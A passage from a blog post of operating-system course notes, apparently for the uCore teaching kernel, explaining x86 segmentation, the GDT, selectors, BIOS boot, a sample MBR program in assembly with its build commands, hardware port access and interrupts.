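segmented</h4><ul><li>Early programs accessed physical memory directly, so two compiled programs whose addresses overlapped could not run at the same time.</li><li>The CPU accesses memory as "segment base + offset within the segment". The benefit is that programs become relocatable and several programs can run together.</li><li>A segment base does not have to be a multiple of 65536.</li><li>To load a user program, copy the whole segment to its new location and set the segment base register to that location. The program then runs correctly, because it only uses offsets within the segment.</li><li>By changing the segment base, that is, by moving a segment window around in memory, a program can reach any memory location. Segmentation divides a large memory into small, addressable segments that together cover all of memory.</li><li>With segmentation, an early CPU in real mode with 16-bit registers computes <strong>(segment base &lt;&lt; 4) + offset within the segment</strong> to reach a 20-bit address space.</li></ul><blockquote><p>Segments in program code are not the same thing as CPU segments. The compiler sorts pieces of a program by the attributes their data has, for example into a read-only code segment and a writable data segment. The compiler does not give a segment its attributes: for the code segment, it merely groups the code together without attaching any extra information.</p></blockquote><ul><li><strong>In real mode, a segment register holds the segment base directly. In protected mode, a segment register no longer holds the segment base; it holds a segment selector.</strong></li><li>The segmentation mechanism involves four key items: the logical address, the segment descriptor (which describes the attributes of a segment), the segment descriptor table (an "array" of segment descriptors), and the segment selector (held in a segment register and used as the index of an entry in the segment descriptor table). Segmented memory management is available only in <strong>protected mode</strong>.</li></ul><h4 id="b-将逻辑地址转换为物理地址的两步操作">b. The two steps that translate a logical address into a physical address</h4><blockquote><p>A logical address is the virtual address that the programmer sees.</p></blockquote><ul><li>Segment translation: a logical address consists of a segment selector and a segment offset. The CPU uses the selector as an index into the segment descriptor table, finds the corresponding segment descriptor, and adds the offset to the segment base stored in that descriptor. The result is the linear address.</li><li>Page translation: this step translates the linear address into a physical address.<br><img src="/2020/08/uCore-1/segmentTranslation.png" alt="img"></li></ul><h4 id="c-段描述符">c. 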
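Segment Descriptors</h4><ul><li><p>Under protected-mode segmentation, each segment is defined by three parameters: the base address, the limit, and the attributes.</p><ul><li>Base address: the starting address of the segment in the linear address space. A segment can start at any byte of the 32-bit linear address space; unlike real mode, the boundary does not have to be divisible by 16.</li><li>Limit: the size of the segment, expressed either in bytes or in units of 4KB.</li><li>Attributes: the various properties of the segment.<ul><li>The granularity bit, written G. G=0 means the limit is in bytes, so the 20-bit limit covers 1 byte to 1MB in steps of 1 byte. G=1 means the limit is in units of 4KB, so the 20-bit limit covers 4KB to 4GB in steps of 4KB.</li><li>Type (TYPE): distinguishes the different kinds of descriptors. It indicates whether the segment is a code segment or a data segment, whether it can be read, written, or executed, its expansion direction, and so on. Its 4 bits, from most significant to least significant, are:<ul><li>Executable bit: 1 means executable, 0 means not executable.</li><li>Conforming bit: 1 means a conforming code segment, 0 means a non-conforming code segment.</li><li>Read/write bit: 1 means readable and writable, 0 means read-only.</li><li>Accessed bit: 1 means accessed, 0 means not accessed.</li></ul></li><li>Descriptor Privilege Level (DPL): used by the protection mechanism.</li><li>Segment-Present bit: if this bit is 0, the descriptor is invalid and cannot be used for address translation. If an invalid descriptor is loaded into a segment register, the processor raises an exception immediately. The operating system is free to use the bits marked as AVAILABLE.</li><li>Accessed bit: the processor sets this bit automatically when the segment is accessed (that is, when a selector pointing to this descriptor is loaded into a segment register). The operating system may clear it.</li></ul></li></ul></li><li><p>Format of a segment descriptor<br><img src="/2020/08/uCore-1/SegmentDescription.png" alt="img"></p></li><li><p>Structure of a segment descriptor</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* segment descriptors */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">segdesc</span> &#123;</span><br><span class="line">    <span class="type">unsigned</span> sd_lim_15_0 : <span class="number">16</span>;        <span class="comment">// low bits of segment limit</span></span><br><span class="line">    <span 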
class="type">unsigned</span> sd_base_15_0 : <span class="number">16</span>;        <span class="comment">// low bits of segment base address</span></span><br><span class="line">    <span class="type">unsigned</span> sd_base_23_16 : <span class="number">8</span>;        <span class="comment">// middle bits of segment base address</span></span><br><span class="line">    <span class="type">unsigned</span> sd_type : <span class="number">4</span>;            <span class="comment">// segment type (see STS_ constants)</span></span><br><span class="line">    <span class="type">unsigned</span> sd_s : <span class="number">1</span>;                <span class="comment">// 0 = system, 1 = application</span></span><br><span class="line">    <span class="type">unsigned</span> sd_dpl : <span class="number">2</span>;            <span class="comment">// descriptor Privilege Level</span></span><br><span class="line">    <span class="type">unsigned</span> sd_p : <span class="number">1</span>;                <span class="comment">// present</span></span><br><span class="line">    <span class="type">unsigned</span> sd_lim_19_16 : <span class="number">4</span>;        <span class="comment">// high bits of segment limit</span></span><br><span class="line">    <span class="type">unsigned</span> sd_avl : <span class="number">1</span>;            <span class="comment">// unused (available for software use)</span></span><br><span class="line">    <span class="type">unsigned</span> sd_rsv1 : <span class="number">1</span>;            <span class="comment">// reserved</span></span><br><span class="line">    <span class="type">unsigned</span> sd_db : <span class="number">1</span>;                <span class="comment">// 0 = 16-bit segment, 1 = 32-bit segment</span></span><br><span class="line">    <span class="type">unsigned</span> sd_g : <span class="number">1</span>;                <span class="comment">// granularity: limit scaled by 4K when set</span></span><br><span class="line">    <span 
class="type">unsigned</span> sd_base_31_24 : <span class="number">8</span>;        <span class="comment">// high bits of segment base address</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></li></ul><h4 id="d-全局描述符表">d. Global Descriptor Table</h4><ul><li>The Global Descriptor Table (GDT) is an "array" of segment descriptors. Its starting address is stored in the global descriptor table register, GDTR. GDTR is 48 bits long: the high 32 bits are the base address and the low 16 bits are the table limit.</li><li>A demo of a global descriptor table</li></ul><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> SEG(type, base, lim, dpl)                        \</span></span><br><span class="line"><span class="meta">    (struct segdesc)&#123;                                    \</span></span><br><span class="line"><span class="meta">        ((lim) &gt;&gt; 12) &amp; 0xffff, (base) &amp; 0xffff,        \</span></span><br><span class="line"><span class="meta">        ((base) &gt;&gt; 16) &amp; 0xff, type, 1, dpl, 1,            \</span></span><br><span class="line"><span class="meta">        (unsigned)(lim) &gt;&gt; 28, 0, 0, 1, 1,                
\</span></span><br><span class="line"><span class="meta">        (unsigned) (base) &gt;&gt; 24                            \</span></span><br><span class="line"><span class="meta">    &#125;</span></span><br><span class="line"><span class="comment">/* *</span></span><br><span class="line"><span class="comment"> * Global Descriptor Table:</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * The kernel and user segments are identical (except for the DPL). To load</span></span><br><span class="line"><span class="comment"> * the %ss register, the CPL must equal the DPL. Thus, we must duplicate the</span></span><br><span class="line"><span class="comment"> * segments for the user and the kernel. Defined as follows:</span></span><br><span class="line"><span class="comment"> *   - 0x0 :  unused (always faults -- for trapping NULL far pointers)</span></span><br><span class="line"><span class="comment"> *   - 0x8 :  kernel code segment</span></span><br><span class="line"><span class="comment"> *   - 0x10:  kernel data segment</span></span><br><span class="line"><span class="comment"> *   - 0x18:  user code segment</span></span><br><span class="line"><span class="comment"> *   - 0x20:  user data segment</span></span><br><span class="line"><span class="comment"> *   - 0x28:  defined for tss, initialized in gdt_init</span></span><br><span class="line"><span class="comment"> * */</span></span><br><span class="line"><span class="type">static</span> <span class="keyword">struct</span> <span class="title class_">segdesc</span> gdt[] = &#123;</span><br><span class="line">    SEG_NULL,</span><br><span class="line">    [SEG_KTEXT] = <span class="built_in">SEG</span>(STA_X | STA_R, <span class="number">0x0</span>, <span class="number">0xFFFFFFFF</span>, DPL_KERNEL),</span><br><span class="line">    [SEG_KDATA] = <span class="built_in">SEG</span>(STA_W, <span class="number">0x0</span>, <span 
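class="number">0xFFFFFFFF</span>, DPL_KERNEL),</span><br><span class="line">    [SEG_UTEXT] = <span class="built_in">SEG</span>(STA_X | STA_R, <span class="number">0x0</span>, <span class="number">0xFFFFFFFF</span>, DPL_USER),</span><br><span class="line">    [SEG_UDATA] = <span class="built_in">SEG</span>(STA_W, <span class="number">0x0</span>, <span class="number">0xFFFFFFFF</span>, DPL_USER),</span><br><span class="line">    [SEG_TSS]    = SEG_NULL,</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><h4 id="e-选择子">e. Selectors</h4><ul><li>The selector portion of a logical address chooses which descriptor table to use and which descriptor within that table. A selector can be part of a pointer variable and is therefore visible to application programmers, but its value is usually set by the linker or loader.</li><li>Structure of a segment selector<ul><li>Index: selects one of the 8192 descriptors in a descriptor table. The processor multiplies the index by 8 (the size of a descriptor) and adds the base address of the descriptor table to locate the descriptor.</li><li>Table Indicator (TI): chooses which descriptor table to access. 0 means the Global Descriptor Table (GDT), 1 means the Local Descriptor Table (LDT).</li><li>Requested Privilege Level (RPL): used by the protection mechanism.<br><img src="/2020/08/uCore-1/FormatOfSelector.png" alt="img"></li></ul></li><li>The first descriptor in the GDT is not used by the CPU, so a selector whose Index and Table Indicator are both 0 (i.e. one that points to the first GDT entry) serves as a null selector. Loading a null selector into a data-segment register (DS, ES, FS, or GS) does not raise an exception, but using a null selector to access memory does.</li></ul><h3 id="6-BIOS是如何苏醒的（重要）">6. How the BIOS Wakes Up (Important)</h3><ul><li>The BIOS code is stored in ROM, which is mapped to the top of the low 1MB of memory, i.e. addresses <code>0xF0000~0xFFFFF</code>. The BIOS entry point is <code>0xFFFF0</code>.<br>At power-on, the CPU's CS:IP registers are forced to <code>0xF000:0xFFF0</code>, i.e. <code>0xFFFF0</code>.<br>Real mode can address at most 1MB, which leaves only 16 bytes between <code>0xFFFF0</code> and the top of the address space, so the instruction there is a jump, <code>jmp far f000:e05b</code>, to the real BIOS code. The BIOS then detects and initializes peripherals, builds its data structures and the Interrupt Vector Table (IVT) at <code>0x000-0x3ff</code>, and fills in the interrupt routines.</li><li>Finally, the BIOS checks the sector at head 0, track 0, sector 1 of the boot disk (the MBR). If the last two bytes of this sector are the magic numbers <code>0x55</code> and <code>0xaa</code>, the BIOS assumes the sector contains an executable program, loads its 512 bytes to <code>0x7c00</code>, and jumps there to continue execution. The jump instruction used is <code>jmp 0:0x7c00</code>, a direct absolute far jump.<blockquote><p>Head and track numbers start from 0; sector numbers start from 1.<br><code>0x7c00</code> was chosen so that the loaded code neither overwrites existing data nor gets overwritten by other data.</p></blockquote></li></ul><h3 id="7-MBR-Bootloader">7. 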
MBR/Bootloader</h3><ul><li><p>What the bootloader does</p><ul><li>Switches to protected mode and enables segmentation</li><li>Reads the ELF-format ucore kernel from the disk (the sectors that follow the MBR) and places it at a fixed location in memory.</li><li>Jumps to the ucore OS entry point and hands control over to ucore OS.</li></ul></li><li><p>The MBR is the Master Boot Record, also called the master boot sector. It is the first sector that must be read when the computer accesses the disk after power-on. Its first 446 bytes hold the bootloader code, followed by the "disk partition table" of four 16-byte entries.</p><blockquote><p>The MBR is the most important area of the whole disk. If the MBR is physically damaged, the disk is essentially unusable.</p></blockquote></li><li><p>The bootloader's entry point is <code>0x7c00</code>. Below is a simple MBR-like program that only prints the string <code>1 MBR</code> to the screen and then hangs. It gives a better feel for the structure of an MBR.</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span 
class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">; Master boot program</span></span><br><span class="line"><span class="comment">;------------------------------------------------------------</span></span><br><span class="line"><span class="meta">SECTION</span> MBR vstart=<span class="number">0x7c00</span> <span class="comment">; assemble with a starting address of 0x7c00</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">ax</span>,<span class="built_in">cs</span>   <span class="comment">; cs is 0 at this point; use it to initialize the segment registers</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">ds</span>,<span class="built_in">ax</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">es</span>,<span class="built_in">ax</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">ss</span>,<span class="built_in">ax</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">fs</span>,<span class="built_in">ax</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">sp</span>,<span class="number">0x7c00</span> <span class="comment">; the space below 0x7c00 is safe for now, so use it as the stack</span></span><br><span class="line"></span><br><span class="line"><span class="comment">; Clear the screen: function 0x06 scrolls all rows up, which clears the screen.</span></span><br><span class="line"><span class="comment">; 
-----------------------------------------------------------</span></span><br><span class="line"><span class="comment">;INT 0x10   function: 0x06   description: scroll window up</span></span><br><span class="line"><span class="comment">;------------------------------------------------------</span></span><br><span class="line"><span class="comment">;Input:</span></span><br><span class="line"><span class="comment">;AH = function number 0x06</span></span><br><span class="line"><span class="comment">;AL = number of rows to scroll (0 means all rows)</span></span><br><span class="line"><span class="comment">;BH = attribute for the scrolled-in rows</span></span><br><span class="line"><span class="comment">;(CL,CH) = (X,Y) of the window's top-left corner</span></span><br><span class="line"><span class="comment">;(DL,DH) = (X,Y) of the window's bottom-right corner</span></span><br><span class="line"><span class="comment">;No return value</span></span><br><span class="line">  <span class="keyword">mov</span>     <span class="built_in">ax</span>, <span class="number">0x600</span></span><br><span class="line">  <span class="keyword">mov</span>     <span class="built_in">bx</span>, <span class="number">0x700</span></span><br><span class="line">  <span class="keyword">mov</span>     <span class="built_in">cx</span>, <span class="number">0</span>          <span class="comment">; top-left corner: (0, 0)</span></span><br><span class="line">  <span class="keyword">mov</span>     <span class="built_in">dx</span>, <span class="number">0x184f</span>     <span class="comment">; bottom-right corner: (79, 24)</span></span><br><span class="line">        <span class="comment">; In VGA text mode a row holds 80 characters and there are 25 rows.</span></span><br><span class="line">        <span class="comment">; Indices start from 0, so 0x18=24 and 0x4f=79</span></span><br><span class="line">  <span class="keyword">int</span>     <span class="number">0x10</span>            <span class="comment">; int 0x10</span></span><br><span class="line"></span><br><span class="line"><span class="comment">;;;;;;;;;    the next three instructions get the cursor position    ;;;;;;;;;</span></span><br><span 
class="comment">;.get_cursor: get the current cursor position; the string is printed at the cursor.</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="number">ah</span>, <span class="number">3</span>   <span class="comment">; input: function 3 gets the cursor position; it goes in ah</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="number">bh</span>, <span class="number">0</span>   <span class="comment">; bh holds the page number whose cursor is queried</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">int</span> <span class="number">0x10</span>    <span class="comment">; output: ch=cursor start line, cl=cursor end line</span></span><br><span class="line">      <span class="comment">; dh=cursor row, dl=cursor column</span></span><br><span class="line"></span><br><span class="line"><span class="comment">;;;;;;;;;    end of getting the cursor position    ;;;;;;;;;;;;;;;;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">;;;;;;;;;     print the string    ;;;;;;;;;;;</span></span><br><span class="line">  <span class="comment">; int 10h again, this time with function 0x13 to print a string</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">ax</span>, message</span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">bp</span>, <span class="built_in">ax</span>    <span class="comment">; es:bp is the address of the string; es equals cs here,</span></span><br><span class="line">      <span class="comment">; since the segment registers were initialized at the start</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">; the cursor position is taken from dx; the cursor info in cx can be ignored</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">cx</span>, <span class="number">5</span>   <span class="comment">; cx is the string length, not counting a terminating 0</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">ax</span>, <span class="number">0x1301</span>  <span class="comment">; function 0x13 writes characters with attributes; it goes in ah,</span></span><br><span class="line">      <span class="comment">; al selects the write mode; al=01: 
write the string and move the cursor along</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">bx</span>, <span class="number">0x2</span> <span class="comment">; bh holds the page to display on, page 0 here,</span></span><br><span class="line">      <span class="comment">; bl holds the character attribute: green on black (bl = 02h)</span></span><br><span class="line">  <span class="keyword">int</span> <span class="number">0x10</span>    <span class="comment">; invoke BIOS interrupt 0x10</span></span><br><span class="line"><span class="comment">;;;;;;;;;      end of printing the string ;;;;;;;;;;;;;;;</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">jmp</span> $   <span class="comment">; jump to this same instruction forever: an infinite loop that parks the program here</span></span><br><span class="line"></span><br><span class="line">  message <span class="built_in">db</span> <span class="string">&quot;1 MBR&quot;</span></span><br><span class="line">  <span class="comment">; fill the remaining space with \0</span></span><br><span class="line">  <span class="built_in">times</span> <span class="number">510</span>-($-$$) <span class="built_in">db</span> <span class="number">0</span> <span class="comment">; $ is the address of the current instruction, $$ is the start address of the current section</span></span><br><span class="line">  <span class="comment">; the last two bytes must be 0x55, 0xaa</span></span><br><span class="line">  <span class="built_in">db</span> <span class="number">0x55</span>,<span class="number">0xaa</span></span><br></pre></td></tr></table></figure></li><li><p>The program uses the <code>vstart</code> directive on its section line. This directive only tells the assembler to compute the addresses of all following data and labels as if the section started at 0x7c00; it does not load anything. Loading the program at 0x7c00 is done by the BIOS.</p></li><li><p>Run the following commands to see the program's output</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Assemble the source</span></span><br><span class="line">nasm mbr.asm -o mbr.bin</span><br><span 
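class="line"><span class="comment"># Build the img image. Note that dd copies differently from cp: it copies at the block level</span></span><br><span class="line"><span class="comment">#   Write the assembled mbr.bin into block 0 of mbr.img</span></span><br><span class="line"><span class="built_in">dd</span> <span class="keyword">if</span>=mbr.bin of=mbr.img bs=512 count=1 conv=notrunc</span><br><span class="line"><span class="comment"># Boot mbr.img on the i386 architecture</span></span><br><span class="line">qemu-system-i386 mbr.img</span><br></pre></td></tr></table></figure><p><img src="/2020/08/uCore-1/1mbr.png" alt="img"></p></li></ul><h3 id="8-硬件访问">8. Hardware Access</h3><ul><li><p>Hardware exposes interfaces to software, so the operating system can control hardware through software (machine instructions). Software logic only takes effect once it acts on hardware.</p></li><li><p>In terms of output, hardware is broadly either serial or parallel, with serial interfaces and parallel interfaces respectively.</p></li><li><p>There are two ways to access external hardware</p><ul><li>Map a peripheral's memory into a range of the address space. The graphics card is an example: it is the adapter for the display, and the CPU talks only to the graphics card, never to the display directly. Its video memory is mapped to <code>0xB8000~0xBFFFF</code> in the low 1MB of the physical address space. When the CPU writes bytes into video memory, content is printed on the screen. The video memory layout is shown below<br><img src="/2020/08/uCore-1/ncardaddress.png" alt="img"></li><li>Go through an IO interface. The CPU accesses only the IO interface and does not care about the peripheral on the other side. The IO interface also has registers of its own.<ul><li><p>The CPU uses IO interfaces to communicate with peripherals. An IO interface is the logic that connects the CPU to an external device, and it has a hardware part and a software part.</p></li><li><p>The computer communicates with an IO interface through machine instructions. Selecting the function and operating mode of an IO interface with software instructions is called "IO interface control programming", and it is usually done with the port read/write instructions in/out. A port is what an IO interface exposes to the CPU; an IO interface generally has a group of ports, each with its own purpose. The <code>in/out</code> instructions are used as follows.</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">in</span> <span class="built_in">al</span>, <span class="built_in">dx</span>  <span class="comment">; al/ax receives the data read from the port; dx holds the port number</span></span><br><span class="line"><span class="keyword">in</span> <span class="built_in">ax</span>, <span class="built_in">dx</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">out</span> <span 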
class="built_in">dx</span>, <span class="built_in">al</span></span><br><span class="line"><span class="keyword">out</span> <span class="built_in">dx</span>, <span class="built_in">ax</span></span><br><span class="line"><span class="keyword">out</span> imm8, <span class="built_in">al</span></span><br><span class="line"><span class="keyword">out</span> imm8, <span class="built_in">ax</span></span><br></pre></td></tr></table></figure></li></ul></li></ul></li><li><p>Example: writing data directly to video memory</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span 
class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">; Master boot program</span></span><br><span class="line"><span class="comment">;------------------------------------------------------------</span></span><br><span class="line"><span class="meta">SECTION</span> MBR vstart=<span class="number">0x7c00</span> <span class="comment">; assemble with a starting address of 0x7c00</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">ax</span>,<span class="built_in">cs</span>   <span class="comment">; cs is 0 at this point; use it to initialize the segment registers</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">ds</span>,<span class="built_in">ax</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">es</span>,<span class="built_in">ax</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">ss</span>,<span class="built_in">ax</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">fs</span>,<span class="built_in">ax</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">sp</span>,<span class="number">0x7c00</span> <span class="comment">; the space below 0x7c00 is safe for now, so use it as the stack</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">ax</span>,<span class="number">0xb800</span> <span class="comment">; segment 0xb800: 0xb8000-0xbffff is the text-mode display adapter memory</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">gs</span>,<span class="built_in">ax</span></span><br><span class="line"></span><br><span class="line"><span class="comment">; Clear the screen: function 0x06 scrolls all rows up, which clears the screen.</span></span><br><span class="line"><span class="comment">; -----------------------------------------------------------</span></span><br><span class="line"><span class="comment">;INT 0x10   function: 0x06   
description: scroll window up</span></span><br><span class="line"><span class="comment">;------------------------------------------------------</span></span><br><span class="line"><span class="comment">;Input:</span></span><br><span class="line"><span class="comment">;AH = function number 0x06</span></span><br><span class="line"><span class="comment">;AL = number of rows to scroll (0 means all rows)</span></span><br><span class="line"><span class="comment">;BH = attribute for the scrolled-in rows</span></span><br><span class="line"><span class="comment">;(CL,CH) = (X,Y) of the window's top-left corner</span></span><br><span class="line"><span class="comment">;(DL,DH) = (X,Y) of the window's bottom-right corner</span></span><br><span class="line"><span class="comment">;No return value</span></span><br><span class="line">  <span class="keyword">mov</span>     <span class="built_in">ax</span>, <span class="number">0x600</span></span><br><span class="line">  <span class="keyword">mov</span>     <span class="built_in">bx</span>, <span class="number">0x700</span></span><br><span class="line">  <span class="keyword">mov</span>     <span class="built_in">cx</span>, <span class="number">0</span>          <span class="comment">; top-left corner: (0, 0)</span></span><br><span class="line">  <span class="keyword">mov</span>     <span class="built_in">dx</span>, <span class="number">0x184f</span>     <span class="comment">; bottom-right corner: (79, 24)</span></span><br><span class="line">        <span class="comment">; In VGA text mode a row holds 80 characters and there are 25 rows.</span></span><br><span class="line">        <span class="comment">; Indices start from 0, so 0x18=24 and 0x4f=79</span></span><br><span class="line">  <span class="keyword">int</span>     <span class="number">0x10</span>            <span class="comment">; int 0x10</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">; Print the blinking string &quot;1 MBR&quot; in red on a green background</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">byte</span> [<span class="built_in">gs</span>:<span class="number">0x00</span>], <span class="string">&#x27;1&#x27;</span></span><br><span class="line">  <span 
class="keyword">mov</span> <span class="built_in">byte</span> [<span class="built_in">gs</span>:<span class="number">0x01</span>], <span class="number">0xa4</span>   <span class="comment">; A means a blinking green background, 4 means a red foreground</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">byte</span> [<span class="built_in">gs</span>:<span class="number">0x02</span>], <span class="string">&#x27; &#x27;</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">byte</span> [<span class="built_in">gs</span>:<span class="number">0x03</span>], <span class="number">0xa4</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">byte</span> [<span class="built_in">gs</span>:<span class="number">0x04</span>], <span class="string">&#x27;M&#x27;</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">byte</span> [<span class="built_in">gs</span>:<span class="number">0x05</span>], <span class="number">0xa4</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">byte</span> [<span class="built_in">gs</span>:<span class="number">0x06</span>], <span class="string">&#x27;B&#x27;</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">byte</span> [<span class="built_in">gs</span>:<span class="number">0x07</span>], <span class="number">0xa4</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">byte</span> [<span class="built_in">gs</span>:<span class="number">0x08</span>], <span class="string">&#x27;R&#x27;</span></span><br><span class="line">  <span class="keyword">mov</span> <span class="built_in">byte</span> [<span class="built_in">gs</span>:<span class="number">0x09</span>], <span class="number">0xa4</span></span><br><span class="line">  <span class="keyword">jmp</span> $   <span class="comment">; jump to this same instruction forever: an infinite loop that parks the program here</span></span><br><span 
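class="line"></span><br><span class="line">  <span class="comment">; fill the remaining space with \0</span></span><br><span class="line">  <span class="built_in">times</span> <span class="number">510</span>-($-$$) <span class="built_in">db</span> <span class="number">0</span></span><br><span class="line">  <span class="comment">; the last two bytes must be 0x55, 0xaa</span></span><br><span class="line">  <span class="built_in">db</span> <span class="number">0x55</span>,<span class="number">0xaa</span></span><br></pre></td></tr></table></figure></li></ul><h3 id="9-中断与异常（重要）">9. Interrupts and Exceptions (Important)</h3><ul><li>An operating system deals with three special kinds of interrupt events:<ul><li>Asynchronous interrupts. These are external events raised by devices outside the CPU, such as I/O interrupts, timer interrupts, and console interrupts.</li><li>Synchronous interrupts. These are internal events raised when the CPU detects an abnormal or illegal condition while executing an instruction (such as division by zero or an out-of-bounds memory access).</li><li>Trap interrupts. These are events raised when a program makes a system call to request a system service.</li></ul></li><li>When the CPU receives an interrupt or exception, it suspends the current program or task, transfers control to the routine responsible for handling the event, and, once the event has been handled, returns to the program or task that was interrupted.</li><li>The mapping from interrupt vectors to interrupt service routines is maintained by the IDT (Interrupt Descriptor Table). The operating system fills the IDT with a descriptor for each interrupt vector, and when an interrupt occurs the CPU looks up the starting address of the corresponding service routine there. The starting address of the IDT itself is stored in the <code>idtr</code> register.</li><li>When the CPU enters an interrupt service routine through an interrupt gate, it automatically clears the <code>IF</code> flag in the <code>eflags</code> register. The <code>IF</code> flag is restored only when the routine returns.</li></ul><h4 id="a-中断描述符表">a. Interrupt Descriptor Table</h4><ul><li>The Interrupt Descriptor Table (IDT) associates each interrupt or exception number with a descriptor that points to its service routine. Like the GDT, the IDT is an array of 8-byte descriptors; unlike the GDT, the first entry of the IDT may contain a descriptor.</li><li>The IDT can be located anywhere in memory. The CPU finds its starting address through the IDT register 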